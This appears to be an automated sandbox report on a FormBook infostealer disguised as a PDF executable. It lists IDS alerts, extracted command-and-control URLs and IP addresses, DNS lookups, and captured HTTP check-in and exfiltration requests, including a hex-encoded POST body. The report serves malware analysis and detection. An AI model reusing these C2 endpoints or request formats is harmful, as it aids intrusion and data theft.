Source:	Binary string: wntdll.pdb source: csc.exe, csc.exe, 00000006.00000003.2122937679.00000000055DD000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000006.00000003.2125210972.000000000578A000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, csc.exe, 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, ipconfig.exe, 00000009.00000002.4592690985.0000000003590000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000003.2188668887.000000000322F000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000003.2190345927.00000000033DD000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000002.4592690985.000000000372E000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000018.00000003.2307893156.000000000493D000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000018.00000002.2316929449.0000000004C8E000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000018.00000002.2316929449.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000018.00000003.2305627379.000000000478D000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 0000001F.00000002.2474950752.000000000382E000.00000040.00001000.00020000.00000000.sdmp, wmplayer.exe, 0000001F.00000003.2336815849.000000000333B000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 0000001F.00000002.2474950752.0000000003690000.00000040.00001000.00020000.00000000.sdmp, wmplayer.exe, 0000001F.00000003.2339364958.00000000034E3000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000022.00000002.2478270514.0000000004C30000.00000040.00001000.00020000.00000000.sdmp, raserver.exe, 00000022.00000002.2478270514.0000000004DCE000.00000040.00001000.00020000.00000000.sdmp, raserver.exe, 00000022.00000003.2474713451.00000000048D4000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000022.00000003.2476433854.0000000004A85000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: RAServer.pdb source: wmplayer.exe, 0000001F.00000002.2476009555.0000000005770000.00000040.10000000.00040000.00000000.sdmp, wmplayer.exe, 0000001F.00000002.2474668893.0000000003167000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000022.00000002.2477735165.0000000000240000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: StrongNameFreeBufferStrongNameTokenFromPublicKeyStrongNameErrorInfo.PDBdiasymreader.dllDllGetClassObject%X%X%X%X%X%X%X%X%X%X%X.TMP0x%016I64xCSCalink.dll with IAlink3 source: ipconfig.exe, 00000009.00000002.4589326105.0000000003325000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: RAServer.pdbGCTL source: wmplayer.exe, 0000001F.00000002.2476009555.0000000005770000.00000040.10000000.00040000.00000000.sdmp, wmplayer.exe, 0000001F.00000002.2474668893.0000000003167000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000022.00000002.2477735165.0000000000240000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: firefox.pdb source: ipconfig.exe, 00000009.00000003.2378244414.0000000006919000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: csc.pdb source: ipconfig.exe, 00000009.00000002.4589326105.0000000003325000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: csc.pdbF source: ipconfig.exe, 00000009.00000002.4589326105.0000000003325000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 4x nop then sub rsp, 28h	0_2_00007FF7D78E28C0
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 4x nop then push rbx	0_2_00007FF7D7851EF0
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 4x nop then push rbx	0_2_00007FF7D7851EF0
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 4x nop then push rdi	0_2_00007FF7D7967580
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 4x nop then push rbx	0_2_00007FF7D79672A0
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 4x nop then push rdi	0_2_00007FF7D78E3020
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 4x nop then push rsi	0_2_00007FF7D78E2FB0
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 4x nop then sub rsp, 28h	0_2_00007FF7D78E2F60
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 4x nop then sub rsp, 28h	0_2_00007FF7D78E2E20
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 4x nop then push rbx	0_2_00007FF7D78E2E20
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 4x nop then push rbx	0_2_00007FF7D78E2E20
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 4x nop then push rbx	0_2_00007FF7D78E2E20
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 4x nop then push rbp	0_2_00007FF7D7904BA0
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 4x nop then push rbx	0_2_00007FF7D78E7B00
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 4x nop then push rsi	0_2_00007FF7D78E7B00
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 4x nop then sub rsp, 28h	0_2_00007FF7D796FA10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 4x nop then pop esi	6_2_00417300
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 4x nop then pop esi	9_2_00C57300

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49725 -> 204.11.56.48:80
Source: Network traffic	Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49725 -> 204.11.56.48:80
Source: Network traffic	Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49725 -> 204.11.56.48:80
Source: Network traffic	Suricata IDS: 2829004 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) : 192.168.2.6:49726 -> 204.11.56.48:80
Source: Network traffic	Suricata IDS: 2829004 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) : 192.168.2.6:49730 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49729 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49729 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49729 -> 3.33.130.190:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.a2zglobalimports.com/kmge/

Performs DNS queries to domains with low reputation

Source:	DNS query: www.icvp5o.xyz
Source:	DNS query: www.mrawkward.xyz

Tries to resolve many domain names, but no domain seems valid

Source: unknown	DNS traffic detected: query: www.mrawkward.xyz replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: www.cq0jt.sbs replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: www.a2zglobalimports.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: www.sejasuapropriachefe.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: www.kickssoccercamp.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: www.icvp5o.xyz replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: www.hhe-crv220.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: www.sacksmantenimiento.store replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: www.n5l780.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: www.bedbillionaire.com replaycode: Name error (3)

Source: global traffic

HTTP traffic detected: GET /kmge/?9ryxAF1X=QP81EcQih7VsKdxvGCQICkK3NoxzpI9p/3Heqjlotj0m3GfPoWteGvRMVqRY4pahxYHvPZXphw==&sBZ4hH=X6X4HNUxL HTTP/1.1Host: www.landfillequip.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View

IP Address: 204.11.56.48 204.11.56.48

Source: Joe Sandbox View

ASN Name: CONFLUENCE-NETWORK-INCVG CONFLUENCE-NETWORK-INCVG

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Windows\explorer.exe

Code function: 7_2_1124CF82 getaddrinfo,setsockopt,recv,

7_2_1124CF82

Source: global traffic

Source: global traffic	DNS traffic detected: DNS query: www.icvp5o.xyz
Source: global traffic	DNS traffic detected: DNS query: www.bedbillionaire.com
Source: global traffic	DNS traffic detected: DNS query: www.mrawkward.xyz
Source: global traffic	DNS traffic detected: DNS query: www.landfillequip.com
Source: global traffic	DNS traffic detected: DNS query: www.kickssoccercamp.com
Source: global traffic	DNS traffic detected: DNS query: www.cq0jt.sbs
Source: global traffic	DNS traffic detected: DNS query: www.hhe-crv220.com
Source: global traffic	DNS traffic detected: DNS query: www.sacksmantenimiento.store
Source: global traffic	DNS traffic detected: DNS query: www.a2zglobalimports.com
Source: global traffic	DNS traffic detected: DNS query: www.shearwaterpembrokeshire.com
Source: global traffic	DNS traffic detected: DNS query: www.sejasuapropriachefe.com
Source: global traffic	DNS traffic detected: DNS query: www.n5l780.com

Source: unknown

HTTP traffic detected: POST /kmge/ HTTP/1.1Host: www.landfillequip.comConnection: closeContent-Length: 178702Cache-Control: no-cacheOrigin: http://www.landfillequip.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.landfillequip.com/kmge/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 39 72 79 78 41 46 31 58 3d 59 74 77 50 61 36 39 41 6a 5f 34 64 57 5f 52 41 4d 79 64 77 53 44 4f 45 4a 35 52 51 68 4e 41 33 70 77 71 45 37 53 67 77 71 67 6f 7a 33 69 48 48 34 57 55 32 46 4b 73 51 47 37 6c 67 75 35 43 56 78 34 79 31 43 71 62 78 6a 77 45 74 56 51 61 5f 71 4c 77 58 65 57 31 35 45 65 41 77 77 5f 54 7a 79 75 63 31 31 38 59 39 32 65 65 37 45 39 58 6d 30 63 56 7a 33 47 49 53 43 62 77 48 57 46 50 44 77 30 36 65 32 54 49 70 4f 6f 34 6a 72 4e 31 67 44 55 69 33 75 44 69 48 50 32 48 78 28 6d 32 38 4a 6b 71 47 46 64 33 55 65 4f 6a 56 79 2d 35 5f 4f 59 63 4d 72 56 46 6e 53 4e 37 65 54 32 6d 7a 72 50 7a 47 6b 6f 31 76 59 45 30 6b 6f 6f 48 39 78 74 4e 2d 66 77 50 6c 72 4f 7e 62 33 4f 78 51 4c 6c 54 4a 6b 37 4a 69 37 6a 4a 51 63 62 33 30 4f 70 56 61 6b 37 64 49 70 73 49 4f 59 6c 54 4a 6f 32 6f 37 55 69 6d 56 77 6a 61 54 33 67 35 6a 6a 4f 68 48 4d 41 7e 39 4f 49 4b 67 76 53 55 4c 7e 77 44 49 71 65 50 6b 72 32 7e 4a 57 4e 45 6c 70 31 4e 76 58 5a 79 37 43 39 65 7a 61 31 57 56 32 59 4b 39 58 51 6b 47 38 54 68 47 4a 35 39 54 39 75 73 50 65 42 75 67 4a 35 74 63 68 79 62 6b 54 5a 39 79 33 4f 58 73 78 35 52 50 34 73 31 69 51 74 63 42 57 51 51 75 68 46 61 6e 6d 47 79 72 76 77 6e 49 74 63 32 77 78 68 41 50 6e 56 4d 4b 51 43 48 4f 46 78 35 6b 66 61 62 76 32 56 61 33 4d 61 52 4f 72 31 46 7a 36 38 30 49 66 62 57 71 58 31 36 6f 38 70 54 76 31 73 50 6f 42 78 34 32 6f 4f 41 44 48 66 35 43 50 56 55 31 53 76 48 78 52 69 51 79 44 70 79 33 68 31 6f 77 6a 44 6d 67 73 52 30 42 5a 32 28 4f 58 2d 56 38 42 50 55 55 51 6f 4b 46 38 2d 31 7a 4e 50 56 43 36 6f 6d 4b 66 45 79 58 44 41 70 43 57 35 77 4b 77 49 72 4b 46 68 78 33 36 2d 50 59 30 79 49 63 6f 56 6e 4b 56 71 32 6a 51 4f 7e 37 69 71 72 6b 6b 52 4b 5f 52 64 6e 72 7e 4d 43 6d 31 59 63 6d 64 33 6c 6b 33 37 69 38 63 51 4a 57 77 39 33 44 6e 7a 74 50 76 78 39 51 4c 56 7a 47 5a 2d 76 4f 6b 61 75 70 71 69 65 43 48 57 39 59 68 51 63 35 49 79 44 75 4c 4d 6c 48 54 72 4f 6e 57 32 31 76 53 51 65 78 70 69 73 75 6c 62 49 35 28 36 71 5f 4f 71 6c 57 28 6b 70 2d 6a 41 51 43 65 68 47 55 50 63 31 4b 61 50 7e 7a 42 54 49 48 34 39 34 2d 75 6b 79 4d 61 62 55 66 79 55 77 46 4f 6b 70 61 65 2d 54 66 49 33 76 67 77 31 4b 4a 50 4b 6b 39 69 53 38 4c 39 69 4e 58 48 30 5a 6c 57 67 31 4f 71 4e 6c 6a 69 32 31 6f 77 4f 75 61 57 42 78 4e 59 4f 7a 44 49 68 6a 4a 78 56 58 5f 46 48 64 59 70 48 52 39 35 64 38 79 50 36 66 49 53 32 6a 5f 65 77 78 34 35 64 78 5a 66 74 6d 75 4e 73 7a 42 74 55 4e 57 75 44 31 2d 31 59 32 6a 61 33 71 30 7e 57 49 38 49 7a 7e 64 6d 37 68 64 50 64 61 52 63 77 69 5f 51 6f 59 68 44 6b 4f 49 61 2d 49 50 32 5f 6c 52 45 5f 52 4a

Source: ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: explorer.exe, 00000007.00000002.4598436939.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2132377434.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4598436939.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2132377434.000000000978C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: 101 2043 5770 pdf.exe, 101 2043 5770 pdf.exe.0.dr	String found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
Source: 101 2043 5770 pdf.exe, 101 2043 5770 pdf.exe.0.dr	String found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
Source: ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: explorer.exe, 00000007.00000002.4598436939.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2132377434.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4598436939.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2132377434.000000000978C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: explorer.exe, 00000007.00000002.4598436939.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2132377434.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4598436939.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2132377434.000000000978C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: 101 2043 5770 pdf.exe, 101 2043 5770 pdf.exe.0.dr	String found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
Source: 101 2043 5770 pdf.exe, 101 2043 5770 pdf.exe.0.dr	String found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
Source: explorer.exe, 00000007.00000002.4598436939.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2132377434.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4598436939.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2132377434.000000000978C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0N
Source: ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: explorer.exe, 00000007.00000002.4598436939.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2132377434.000000000962B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: 101 2043 5770 pdf.exe, 101 2043 5770 pdf.exe.0.dr	String found in binary or memory: http://ocsp.sectigo.com0
Source: explorer.exe, 00000007.00000002.4589318233.00000000028A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.2131057244.0000000007B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000002.4597265016.0000000007B60000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.a2zglobalimports.com
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.a2zglobalimports.com/kmge/
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.a2zglobalimports.com/kmge/www.shearwaterpembrokeshire.com
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.a2zglobalimports.comReferer:
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.agritamaperkasaindonesia.com
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.agritamaperkasaindonesia.com/kmge/
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.agritamaperkasaindonesia.com/kmge/www.blucretebistro.com
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.agritamaperkasaindonesia.comReferer:
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.bedbillionaire.com
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.bedbillionaire.com/kmge/
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.bedbillionaire.com/kmge/www.mrawkward.xyz
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.bedbillionaire.comReferer:
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.blucretebistro.com
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.blucretebistro.com/kmge/
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.blucretebistro.com/kmge/www.gsolartech.com
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.blucretebistro.comReferer:
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.cq0jt.sbs
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.cq0jt.sbs/kmge/
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.cq0jt.sbs/kmge/www.hhe-crv220.com
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.cq0jt.sbsReferer:
Source: ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.gsolartech.com
Source: explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.gsolartech.com/kmge/
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.gsolartech.comReferer:
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.hhe-crv220.com
